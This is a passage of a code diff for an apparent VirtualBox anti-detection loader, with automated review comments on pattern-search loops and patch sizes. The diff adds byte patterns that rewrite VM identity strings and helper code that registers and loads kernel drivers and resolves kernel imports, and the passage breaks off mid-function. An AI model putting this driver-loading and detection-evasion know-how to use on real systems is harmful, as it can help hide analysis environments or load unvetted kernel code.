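Review bot: After a hit in the 80EE loop the next search starts at `(CONST PBYTE)Pattern` with size `DllVirtualSize - (Pattern - DllBase)`, i.e. at the very byte where the previous match began; unless the loop tail outside the hunk advances Pattern past the match, supFindPattern returns the same location again and the loop only stops when `d > MAX_HWID_BLOCKS_DEEP` trips, leaving duplicate entries in DataBlocks. The BEEF loop in the following hunk has the same shape. Separately, `c` indexes DataBlocks on every hit in every section but is never compared with the table's capacity; if DataBlocks is a fixed-size array (its declaration is outside the hunk) a guard such as `if (c >= RTL_NUMBER_OF(DataBlocks)) break;` before each `DataBlocks[c]` write would keep a pattern-rich binary from writing past it. ProcessVirtualBoxFile's body continues on both sides of the hunk.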
@@ -532,29 +505,26 @@ UINT ProcessVirtualBoxFile( // // CAFE // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)PCICAFE_PATTERN, sizeof(PCICAFE_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(1 + Pattern - DllBase); DataBlocks[c].DataLength = sizeof(HWID_PATCH); RtlCopyMemory(DataBlocks[c].Data, HWID_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("CAFE\t\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND("CAFE", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern CAFE not found")); + PATTERN_NOT_FOUND("CAFE"); } - cuiPrintText(LogBuffer, TRUE); if (BuildTable(DataBlocks, c, OutputBuffer, OutputBufferSize)) uResult = 0; else uResult = (UINT)-2; - } while (cond); + } while (FALSE); if (usFileName.Buffer != NULL) { RtlFreeUnicodeString(&usFileName); diff --git a/Source/Zekamashi/loader/patterns.h b/Source/Zekamashi_v2/loader/patterns.h similarity index 77% rename from Source/Zekamashi/loader/patterns.h rename to Source/Zekamashi_v2/loader/patterns.h index c1a2f57..e21ca1e 100644 --- a/Source/Zekamashi/loader/patterns.h +++ b/Source/Zekamashi_v2/loader/patterns.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2017 - 2018 +* (C) COPYRIGHT AUTHORS, 2017 - 2020 * * TITLE: PATTERNS.H * -* VERSION: 1.90 +* VERSION: 2.00 * -* DATE: 11 Jan 2018 +* DATE: 24 Jan 2020 * * Search patterns and patches header file. * 
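Review bot: `uResult = (UINT)-2;` on the BuildTable failure path is a bare sentinel; a named constant (e.g. `#define LDR_RESULT_TABLE_FAILED ((UINT)-2)`, name constructed) would let a reader tell this outcome apart from whatever other failure values the function presumably returns elsewhere. It is also not visible whether BuildTable rejects `c == 0`; if every pattern missed, the function still reaches BuildTable with an empty block list and, on success, returns 0, so a caller could take a file with no applied patches as patched — an explicit `if (c == 0) { uResult = LDR_RESULT_TABLE_FAILED; break; }` before the call would close that, unless BuildTable already handles it. The enclosing ProcessVirtualBoxFile starts before the hunk.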
@@ -44,8 +44,17 @@ static const unsigned char JUSTVIRTUALBOX_PATCH[] = { 0x4D, 0x61, 0x67, 0x69, 0x63, 0x61, 0x6C, 0x52 }; static const unsigned char CONFIGURATION_PATCH[] = { - 0x44, 0x73, 0x64, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x50, 0x61, 0x74, 0x68, 0x00, 0x53, - 0x73, 0x64, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x50, 0x61, 0x74, 0x68, 0x00, 0x00 }; + 0x44, 0x73, 0x64, 0x74, 0x46, 0x69, 0x6C, 0x65, + 0x50, 0x61, 0x74, 0x68, 0x00, 0x53, 0x73, 0x64, + 0x74, 0x46, 0x69, 0x6C, 0x65, 0x50, 0x61, 0x74, + 0x68, 0x00, 0x00 }; + +static const unsigned char CONFIGURATION_PATCH_61[] = { + 0x7C, 0x44, 0x73, 0x64, 0x74, 0x46, 0x69, 0x6C, + 0x65, 0x50, 0x61, 0x74, 0x68, 0x7C, 0x53, 0x73, + 0x64, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x50, 0x61, + 0x74, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 +}; static const unsigned char HWID_PATCH_VIDEO_1[] = { 0xDE, 0x10 }; @@ -60,11 +69,21 @@ static const unsigned char FACP_PATTERN[] = { 0x89, 0x45, 0x90, 0xC7, 0x44, 0x24, 0x34, 0x46, 0x41, 0x43, 0x50 }; +static const unsigned char FACP_PATTERN_61[] = { + 0xC7, 0x44, 0x24, 0x30, 0x56, 0x42, 0x4F, 0x58, + 0x41, 0x0F, 0x45, 0xC6, 0xC7, 0x44, 0x24, 0x34, + 0x46, 0x41, 0x43, 0x50 }; + static const unsigned char RSDT_PATTERN[] = { 0xC7, 0x47, 0x10, 0x56, 0x42, 0x4F, 0x58, 0xC7, 0x47, 0x14, 0x52, 0x53, 0x44, 0x54 }; +static const unsigned char RSDT_PATTERN_61[] = { + 0xC7, 0x43, 0x10, 0x56, 0x42, 0x4F, 0x58, 0xC7, + 0x43, 0x14, 0x52, 0x53, 0x44, 0x54 +}; + static const unsigned char XSDT_PATTERN[] = { 0xC7, 0x43, 0x10, 0x56, 0x42, 0x4F, 0x58, 0xC7, 0x43, 0x14, 0x58, 0x53, 0x44, 0x54 @@ -95,6 +114,11 @@ static const unsigned char JUSTVBOX_PATTERN[] = { 0xC7, 0x81, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01 }; +static const unsigned char JUSTVBOX_PATTERN_61[] = { + 0x41, 0xC7, 0x01, 0x56, 0x42, 0x4F, 0x58, 0x66, + 0xC7, 0x00, 0x00, 0x01, 0x33, 0xc0, 0xc3 +}; + static const unsigned char JUSTVIRTUALBOX_PATTERN[] = { 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x42, 0x6F, 0x78, 0x00 
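Review bot: CONFIGURATION_PATCH_61 is 32 bytes while CFGSTRINGS_PATTERN_61 (added in the later hunk of this file) is 28 bytes, and the loader writes the patch at `26 + Pattern` with `DataLength = sizeof(CONFIGURATION_PATCH_61)`, so the patch begins two bytes before the end of the matched pattern and overwrites 30 bytes beyond it; nothing on either array records that coupling. A comment on the patch, such as `// Applied at CFGSTRINGS_PATTERN_61 match + 26; extends 30 bytes past the matched region — keep both arrays in sync`, would stop a later edit to one array from silently desynchronizing the other, and the same note applies to CONFIGURATION_PATCH (27 bytes, also applied at +26 to the CFGSTRINGS_PATTERN match). Whether the overrun past the match is intentional is not visible here, so the comment should say so explicitly once confirmed.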
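Review bot: `0x33, 0xc0, 0xc3` in JUSTVBOX_PATTERN_61 is the only lowercase hex in this header; every other byte literal uses uppercase, so `0x33, 0xC0, 0xC3` would keep the style uniform. Since the loader applies VBOX_PATCH at `3 + Pattern` for this 15-byte match, a one-line comment on the array stating which bytes of the match are replaced would also help whoever has to refresh the pattern for the next VirtualBox build.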
@@ -124,6 +148,13 @@ static const unsigned char CFGSTRINGS_PATTERN[] = { 0x71, 0x00, 0x00 }; +static const unsigned char CFGSTRINGS_PATTERN_61[] = { + 0x7C, 0x50, 0x61, 0x72, 0x61, 0x6C, 0x6C, 0x65, + 0x6C, 0x30, 0x49, 0x72, 0x71, 0x7C, 0x50, 0x61, + 0x72, 0x61, 0x6C, 0x6C, 0x65, 0x6C, 0x31, 0x49, + 0x72, 0x71, 0x00, 0x00 +}; + /*static const unsigned char CDROMVBOX_PATTERN[] = { 0x31, 0x2E, 0x30, 0x00, 0x43, 0x44, 0x2D, 0x52, 0x4F, 0x4D, 0x00, 0x00, 0x56, 0x42, 0x4F, 0x58, diff --git a/Source/Kasumi/VBoxPatchGen/resource.h b/Source/Zekamashi_v2/loader/resource.h similarity index 71% rename from Source/Kasumi/VBoxPatchGen/resource.h rename to Source/Zekamashi_v2/loader/resource.h index 7ca31da..1225e5a 100644 --- a/Source/Kasumi/VBoxPatchGen/resource.h +++ b/Source/Zekamashi_v2/loader/resource.h @@ -1,12 +1,15 @@ //{{NO_DEPENDENCIES}} // Microsoft Visual C++ generated include file. // Used by Resource.rc +// +#define IDR_PROCEXP 101 +#define IDR_iQVM64 102 // Next default values for new objects // #ifdef APSTUDIO_INVOKED #ifndef APSTUDIO_READONLY_SYMBOLS -#define _APS_NEXT_RESOURCE_VALUE 101 +#define _APS_NEXT_RESOURCE_VALUE 103 #define _APS_NEXT_COMMAND_VALUE 40001 #define _APS_NEXT_CONTROL_VALUE 1001 #define _APS_NEXT_SYMED_VALUE 101 diff --git a/Source/Zekamashi_v2/loader/sup.c b/Source/Zekamashi_v2/loader/sup.c new file mode 100644 index 0000000..4651ac0 --- /dev/null +++ b/Source/Zekamashi_v2/loader/sup.c 
@@ -0,0 +1,1496 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2014 - 2020
+*
+* TITLE: SUP.C
+*
+* VERSION: 2.00
+*
+* DATE: 24 Jan 2020
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+
+/*
+* supHeapAlloc
+*
+* Purpose:
+*
+* Wrapper for RtlAllocateHeap with WinObjEx heap.
+*
+*/
+PVOID supHeapAlloc(
+ _In_ SIZE_T Size)
+{
+ return RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, Size);
+}
+
+/*
+* supHeapFree
+*
+* Purpose:
+*
+* Wrapper for RtlFreeHeap with WinObjEx heap.
+*
+*/
+BOOL supHeapFree(
+ _In_ PVOID Memory)
+{
+ return RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Memory);
+}
+
+/*
+* supPurgeSystemCache
+*
+* Purpose:
+*
+* Flush file cache and memory standby list.
+*
+*/
+VOID supPurgeSystemCache(
+ VOID
+)
+{
+ SYSTEM_FILECACHE_INFORMATION sfc;
+ SYSTEM_MEMORY_LIST_COMMAND smlc;
+
+ //flush file system cache
+ if (NT_SUCCESS(supEnablePrivilege(SE_INCREASE_QUOTA_PRIVILEGE, TRUE))) {
+ RtlSecureZeroMemory(&sfc, sizeof(SYSTEM_FILECACHE_INFORMATION));
+ sfc.MaximumWorkingSet = (SIZE_T)-1;
+ sfc.MinimumWorkingSet = (SIZE_T)-1;
+ NtSetSystemInformation(SystemFileCacheInformation, &sfc, sizeof(sfc));
+ }
+
+ //flush standby list
+ if (NT_SUCCESS(supEnablePrivilege(SE_PROF_SINGLE_PROCESS_PRIVILEGE, TRUE))) {
+ smlc = MemoryPurgeStandbyList;
+ NtSetSystemInformation(SystemMemoryListInformation, &smlc, sizeof(smlc));
+ }
+}
+
+/*
+* supxDeleteKeyRecursive
+*
+* Purpose:
+*
+* Delete key and all it subkeys/values.
+* +*/ +BOOL supxDeleteKeyRecursive( + _In_ HKEY hKeyRoot, + _In_ LPWSTR lpSubKey) +{ + LPWSTR lpEnd; + LONG lResult; + DWORD dwSize; + WCHAR szName[MAX_PATH + 1]; + HKEY hKey; + FILETIME ftWrite; + + // + // Attempt to delete key as is. + // + lResult = RegDeleteKey(hKeyRoot, lpSubKey); + if (lResult == ERROR_SUCCESS) + return TRUE; + + // + // Try to open key to check if it exist. + // + lResult = RegOpenKeyEx(hKeyRoot, lpSubKey, 0, KEY_READ, &hKey); + if (lResult != ERROR_SUCCESS) { + if (lResult == ERROR_FILE_NOT_FOUND) + return TRUE; + else + return FALSE; + } + + // + // Add slash to the key path if not present. + // + lpEnd = _strend(lpSubKey); + if (*(lpEnd - 1) != TEXT('\\')) { + *lpEnd = TEXT('\\'); + lpEnd++; + *lpEnd = TEXT('\0'); + } + + // + // Enumerate subkeys and call this func for each. + // + dwSize = MAX_PATH; + lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL, + NULL, NULL, &ftWrite); + + if (lResult == ERROR_SUCCESS) { + + do { + + _strncpy(lpEnd, MAX_PATH, szName, MAX_PATH); + + if (!supxDeleteKeyRecursive(hKeyRoot, lpSubKey)) + break; + + dwSize = MAX_PATH; + + lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL, + NULL, NULL, &ftWrite); + + } while (lResult == ERROR_SUCCESS); + } + + lpEnd--; + *lpEnd = TEXT('\0'); + + RegCloseKey(hKey); + + // + // Delete current key, all it subkeys should be already removed. + // + lResult = RegDeleteKey(hKeyRoot, lpSubKey); + if (lResult == ERROR_SUCCESS) + return TRUE; + + return FALSE; +} + +/* +* supRegDeleteKeyRecursive +* +* Purpose: +* +* Delete key and all it subkeys/values. +* +* Remark: +* +* SubKey should not be longer than 260 chars. 
+* +*/ +BOOL supRegDeleteKeyRecursive( + _In_ HKEY hKeyRoot, + _In_ LPWSTR lpSubKey) +{ + WCHAR szKeyName[MAX_PATH * 2]; + RtlSecureZeroMemory(szKeyName, sizeof(szKeyName)); + _strncpy(szKeyName, MAX_PATH * 2, lpSubKey, MAX_PATH); + return supxDeleteKeyRecursive(hKeyRoot, szKeyName); +} + +/* +* supEnablePrivilege +* +* Purpose: +* +* Enable/Disable given privilege. +* +* Return NTSTATUS value. +* +*/ +NTSTATUS supEnablePrivilege( + _In_ DWORD Privilege, + _In_ BOOL Enable +) +{ + ULONG Length; + NTSTATUS Status; + HANDLE TokenHandle; + LUID LuidPrivilege; + + PTOKEN_PRIVILEGES NewState; + UCHAR Buffer[sizeof(TOKEN_PRIVILEGES) + sizeof(LUID_AND_ATTRIBUTES)]; + + Status = NtOpenProcessToken( + NtCurrentProcess(), + TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, + &TokenHandle); + + if (!NT_SUCCESS(Status)) { + return Status; + } + + NewState = (PTOKEN_PRIVILEGES)Buffer; + + LuidPrivilege = RtlConvertUlongToLuid(Privilege); + + NewState->PrivilegeCount = 1; + NewState->Privileges[0].Luid = LuidPrivilege; + NewState->Privileges[0].Attributes = Enable ? SE_PRIVILEGE_ENABLED : 0; + + Status = NtAdjustPrivilegesToken(TokenHandle, + FALSE, + NewState, + sizeof(Buffer), + NULL, + &Length); + + if (Status == STATUS_NOT_ALL_ASSIGNED) { + Status = STATUS_PRIVILEGE_NOT_HELD; + } + + NtClose(TokenHandle); + return Status; +} + +/* +* supCopyMemory +* +* Purpose: +* +* Copies bytes between buffers. +* +* dest - Destination buffer +* cbdest - Destination buffer size in bytes +* src - Source buffer +* cbsrc - Source buffer size in bytes +* +*/ +void supCopyMemory( + _Inout_ void* dest, + _In_ size_t cbdest, + _In_ const void* src, + _In_ size_t cbsrc +) +{ + char* d = (char*)dest; + char* s = (char*)src; + + if ((dest == 0) || (src == 0) || (cbdest == 0)) + return; + if (cbdest < cbsrc) + cbsrc = cbdest; + + while (cbsrc > 0) { + *d++ = *s++; + cbsrc--; + } +} + +/* +* supGetSystemInfo +* +* Purpose: +* +* Wrapper for NtQuerySystemInformation. 
+* +*/ +PVOID supGetSystemInfo( + _In_ SYSTEM_INFORMATION_CLASS InfoClass +) +{ + INT c = 0; + PVOID Buffer = NULL; + ULONG Size = 0x1000; + NTSTATUS status; + ULONG memIO; + + do { + Buffer = supHeapAlloc((SIZE_T)Size); + if (Buffer != NULL) { + status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO); + } + else { + return NULL; + } + if (status == STATUS_INFO_LENGTH_MISMATCH) { + supHeapFree(Buffer); + Buffer = NULL; + Size *= 2; + c++; + if (c > 100) { + status = STATUS_SECRET_TOO_LONG; + break; + } + } + } while (status == STATUS_INFO_LENGTH_MISMATCH); + + if (NT_SUCCESS(status)) { + return Buffer; + } + + if (Buffer) { + supHeapFree(Buffer); + } + return NULL; +} + +/* +* supProcessExist +* +* Purpose: +* +* Return TRUE if specified process launched, FALSE otherwise or on error. +* +*/ +BOOL supProcessExist( + _In_ LPWSTR lpProcessName +) +{ + PSYSTEM_PROCESSES_INFORMATION ProcessList, pList; + UNICODE_STRING procName; + BOOL bResult = FALSE; + + ProcessList = (PSYSTEM_PROCESSES_INFORMATION)supGetSystemInfo(SystemProcessInformation); + if (ProcessList == NULL) { + return bResult; + } + + do { + RtlSecureZeroMemory(&procName, sizeof(procName)); + RtlInitUnicodeString(&procName, lpProcessName); + pList = ProcessList; + + for (;;) { + if (RtlEqualUnicodeString(&procName, &pList->ImageName, TRUE)) { + bResult = TRUE; + break; + } + if (pList->NextEntryDelta == 0) { + break; + } + pList = (PSYSTEM_PROCESSES_INFORMATION)(((LPBYTE)pList) + pList->NextEntryDelta); + } + + } while (FALSE); + + supHeapFree(ProcessList); + return bResult; +} + +/* +* supxCreateDriverEntry +* +* Purpose: +* +* Creating registry entry for driver. 
+* +*/ +NTSTATUS supxCreateDriverEntry( + _In_opt_ LPCWSTR DriverPath, + _In_ LPCWSTR KeyName +) +{ + NTSTATUS status = STATUS_UNSUCCESSFUL; + DWORD dwData, dwResult; + HKEY keyHandle = NULL; + UNICODE_STRING driverImagePath; + + RtlInitEmptyUnicodeString(&driverImagePath, NULL, 0); + + if (DriverPath) { + if (!RtlDosPathNameToNtPathName_U(DriverPath, + &driverImagePath, + NULL, + NULL)) + { + return STATUS_INVALID_PARAMETER_2; + } + } + + if (ERROR_SUCCESS != RegCreateKeyEx(HKEY_LOCAL_MACHINE, + KeyName, + 0, + NULL, + REG_OPTION_NON_VOLATILE, + KEY_ALL_ACCESS, + NULL, + &keyHandle, + NULL)) + { + status = STATUS_ACCESS_DENIED; + goto Cleanup; + } + + dwResult = ERROR_SUCCESS; + + do { + + dwData = SERVICE_ERROR_NORMAL; + dwResult = RegSetValueEx(keyHandle, + TEXT("ErrorControl"), + 0, + REG_DWORD, + (BYTE*)&dwData, + sizeof(dwData)); + if (dwResult != ERROR_SUCCESS) + break; + + dwData = SERVICE_KERNEL_DRIVER; + dwResult = RegSetValueEx(keyHandle, + TEXT("Type"), + 0, + REG_DWORD, + (BYTE*)&dwData, + sizeof(dwData)); + if (dwResult != ERROR_SUCCESS) + break; + + dwData = SERVICE_DEMAND_START; + dwResult = RegSetValueEx(keyHandle, + TEXT("Start"), + 0, + REG_DWORD, + (BYTE*)&dwData, + sizeof(dwData)); + + if (dwResult != ERROR_SUCCESS) + break; + + if (DriverPath) { + dwResult = RegSetValueEx(keyHandle, + TEXT("ImagePath"), + 0, + REG_EXPAND_SZ, + (BYTE*)driverImagePath.Buffer, + (DWORD)driverImagePath.Length + sizeof(UNICODE_NULL)); + } + + } while (FALSE); + + RegCloseKey(keyHandle); + + if (dwResult != ERROR_SUCCESS) { + status = STATUS_ACCESS_DENIED; + } + else + { + status = STATUS_SUCCESS; + } + +Cleanup: + if (DriverPath) { + if (driverImagePath.Buffer) { + RtlFreeUnicodeString(&driverImagePath); + } + } + return status; +} + +/* +* supLoadDriver +* +* Purpose: +* +* Install driver and load it. +* +* N.B. +* SE_LOAD_DRIVER_PRIVILEGE is required to be assigned and enabled. 
+* +*/ +NTSTATUS supLoadDriver( + _In_ LPCWSTR DriverName, + _In_ LPCWSTR DriverPath, + _In_ BOOLEAN UnloadPreviousInstance +) +{ + SIZE_T keyOffset; + NTSTATUS status = STATUS_UNSUCCESSFUL; + UNICODE_STRING driverServiceName; + + WCHAR szBuffer[MAX_PATH + 1]; + + if (DriverName == NULL) + return STATUS_INVALID_PARAMETER_1; + if (DriverPath == NULL) + return STATUS_INVALID_PARAMETER_2; + + RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); + + keyOffset = RTL_NUMBER_OF(NT_REG_PREP); + + if (FAILED(StringCchPrintf(szBuffer, MAX_PATH, + DRIVER_REGKEY, + NT_REG_PREP, + DriverName))) + { + return STATUS_INVALID_PARAMETER_1; + } + + status = supxCreateDriverEntry(DriverPath, + &szBuffer[keyOffset]); + + if (!NT_SUCCESS(status)) + return status; + + RtlInitUnicodeString(&driverServiceName, szBuffer); + status = NtLoadDriver(&driverServiceName); + + if (UnloadPreviousInstance) { + if ((status == STATUS_IMAGE_ALREADY_LOADED) || + (status == STATUS_OBJECT_NAME_COLLISION) || + (status == STATUS_OBJECT_NAME_EXISTS)) + { + status = NtUnloadDriver(&driverServiceName); + if (NT_SUCCESS(status)) { + status = NtLoadDriver(&driverServiceName); + } + } + } + else { + if (status == STATUS_OBJECT_NAME_EXISTS) + status = STATUS_SUCCESS; + } + + return status; +} + +/* +* supUnloadDriver +* +* Purpose: +* +* Call driver unload and remove corresponding registry key. +* +* N.B. +* SE_LOAD_DRIVER_PRIVILEGE is required to be assigned and enabled. 
+* +*/ +NTSTATUS supUnloadDriver( + _In_ LPCWSTR DriverName, + _In_ BOOLEAN fRemove +) +{ + NTSTATUS status; + SIZE_T keyOffset; + UNICODE_STRING driverServiceName; + + WCHAR szBuffer[MAX_PATH + 1]; + + RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); + + if (FAILED(StringCchPrintf(szBuffer, MAX_PATH, + DRIVER_REGKEY, + NT_REG_PREP, + DriverName))) + { + return STATUS_INVALID_PARAMETER_1; + } + + keyOffset = RTL_NUMBER_OF(NT_REG_PREP); + + status = supxCreateDriverEntry(NULL, + &szBuffer[keyOffset]); + + if (!NT_SUCCESS(status)) + return status; + + RtlInitUnicodeString(&driverServiceName, szBuffer); + status = NtUnloadDriver(&driverServiceName); + + if (NT_SUCCESS(status)) { + if (fRemove) + supRegDeleteKeyRecursive(HKEY_LOCAL_MACHINE, &szBuffer[keyOffset]); + } + + return status; +} + +/* +* supOpenDriver +* +* Purpose: +* +* Open handle for helper driver. +* +*/ +NTSTATUS supOpenDriver( + _In_ LPCWSTR DriverName, + _Out_ PHANDLE DeviceHandle +) +{ + NTSTATUS status = STATUS_UNSUCCESSFUL; + + UNICODE_STRING usDeviceLink; + OBJECT_ATTRIBUTES obja; + IO_STATUS_BLOCK iost; + + TCHAR szDeviceLink[MAX_PATH + 1]; + + // assume failure + if (DeviceHandle) + *DeviceHandle = NULL; + else + return STATUS_INVALID_PARAMETER_2; + + if (DriverName) { + + RtlSecureZeroMemory(szDeviceLink, sizeof(szDeviceLink)); + + if (FAILED(StringCchPrintf(szDeviceLink, + MAX_PATH, + TEXT("\\DosDevices\\%wS"), + DriverName))) + { + return STATUS_INVALID_PARAMETER_1; + } + + RtlInitUnicodeString(&usDeviceLink, szDeviceLink); + InitializeObjectAttributes(&obja, &usDeviceLink, OBJ_CASE_INSENSITIVE, NULL, NULL); + + status = NtCreateFile(DeviceHandle, + GENERIC_READ | GENERIC_WRITE, + &obja, + &iost, + NULL, + 0, + 0, + FILE_OPEN, + 0, + NULL, + 0); + + } + else { + status = STATUS_INVALID_PARAMETER_1; + } + + return status; +} + +/* +* supGetNtOsBase +* +* Purpose: +* +* Return ntoskrnl base address. 
+* +*/ +ULONG_PTR supGetNtOsBase( + VOID +) +{ + PRTL_PROCESS_MODULES miSpace; + ULONG_PTR NtOsBase = 0; + + miSpace = (PRTL_PROCESS_MODULES)supGetSystemInfo(SystemModuleInformation); + if (miSpace) { + NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace); + } + return NtOsBase; +} + +/* +* supQueryResourceData +* +* Purpose: +* +* Load resource by given id (win32 FindResource, SizeofResource, LockResource). +* +*/ +PBYTE supQueryResourceData( + _In_ ULONG_PTR ResourceId, + _In_ PVOID DllHandle, + _In_ PULONG DataSize +) +{ + NTSTATUS status; + ULONG_PTR IdPath[3]; + IMAGE_RESOURCE_DATA_ENTRY* DataEntry; + PBYTE Data = NULL; + ULONG SizeOfData = 0; + + if (DllHandle != NULL) { + + IdPath[0] = (ULONG_PTR)RT_RCDATA; //type + IdPath[1] = ResourceId; //id + IdPath[2] = 0; //lang + + status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry); + if (NT_SUCCESS(status)) { + status = LdrAccessResource(DllHandle, DataEntry, (PVOID*)&Data, &SizeOfData); + if (NT_SUCCESS(status)) { + if (DataSize) { + *DataSize = SizeOfData; + } + } + } + } + return Data; +} + +/* +* supWriteBufferToFile +* +* Purpose: +* +* Create new file (or open existing) and write (append) buffer to it. 
+* +*/ +SIZE_T supWriteBufferToFile( + _In_ PWSTR lpFileName, + _In_ PVOID Buffer, + _In_ SIZE_T Size, + _In_ BOOL Flush, + _In_ BOOL Append, + _Out_opt_ NTSTATUS* Result +) +{ + NTSTATUS Status = STATUS_UNSUCCESSFUL; + DWORD dwFlag; + HANDLE hFile = NULL; + OBJECT_ATTRIBUTES attr; + UNICODE_STRING NtFileName; + IO_STATUS_BLOCK IoStatus; + LARGE_INTEGER Position; + ACCESS_MASK DesiredAccess; + PLARGE_INTEGER pPosition = NULL; + ULONG_PTR nBlocks, BlockIndex; + ULONG BlockSize, RemainingSize; + PBYTE ptr = (PBYTE)Buffer; + SIZE_T BytesWritten = 0; + + if (Result) + *Result = STATUS_UNSUCCESSFUL; + + if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE) { + if (Result) + *Result = STATUS_INVALID_PARAMETER_1; + return 0; + } + + DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE; + dwFlag = FILE_OVERWRITE_IF; + + if (Append != FALSE) { + DesiredAccess |= FILE_READ_ACCESS; + dwFlag = FILE_OPEN_IF; + } + + InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL); + + __try { + Status = NtCreateFile(&hFile, DesiredAccess, &attr, + &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag, + FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); + + if (!NT_SUCCESS(Status)) + __leave; + + pPosition = NULL; + + if (Append != FALSE) { + Position.LowPart = FILE_WRITE_TO_END_OF_FILE; + Position.HighPart = -1; + pPosition = &Position; + } + + if (Size < 0x80000000) { + BlockSize = (ULONG)Size; + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; + + BytesWritten += IoStatus.Information; + } + else { + BlockSize = 0x7FFFFFFF; + nBlocks = (Size / BlockSize); + for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) { + + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; + + ptr += BlockSize; + BytesWritten += IoStatus.Information; + } + RemainingSize = (ULONG)(Size % BlockSize); + if 
(RemainingSize != 0) { + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; + BytesWritten += IoStatus.Information; + } + } + } + __finally { + if (hFile != NULL) { + if (Flush != FALSE) NtFlushBuffersFile(hFile, &IoStatus); + NtClose(hFile); + } + RtlFreeUnicodeString(&NtFileName); + if (Result) *Result = Status; + } + return BytesWritten; +} + +/* +* supGetProcAddress +* +* Purpose: +* +* Get NtOskrnl procedure address. +* +*/ +ULONG_PTR supGetProcAddress( + _In_ ULONG_PTR KernelBase, + _In_ ULONG_PTR KernelImage, + _In_ LPCSTR FunctionName +) +{ + ANSI_STRING cStr; + ULONG_PTR pfn = 0; + + RtlInitString(&cStr, FunctionName); + if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID*)&pfn))) + return 0; + + return KernelBase + (pfn - KernelImage); +} + +/* +* supResolveKernelImport +* +* Purpose: +* +* Resolve import (ntoskrnl only). +* +*/ +void supResolveKernelImport( + _In_ ULONG_PTR Image, + _In_ ULONG_PTR KernelImage, + _In_ ULONG_PTR KernelBase +) +{ + PIMAGE_OPTIONAL_HEADER popth; + ULONG_PTR ITableVA, * nextthunk; + PIMAGE_IMPORT_DESCRIPTOR ITable; + PIMAGE_THUNK_DATA pthunk; + PIMAGE_IMPORT_BY_NAME pname; + ULONG i; + + popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; + + if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT) + return; + + ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; + if (ITableVA == 0) + return; + + ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA); + + if (ITable->OriginalFirstThunk == 0) + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk); + else + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk); + + for (i = 0; pthunk->u1.Function != 0; i++, pthunk++) { + nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk); + if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) { + pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData); + nextthunk[i] = 
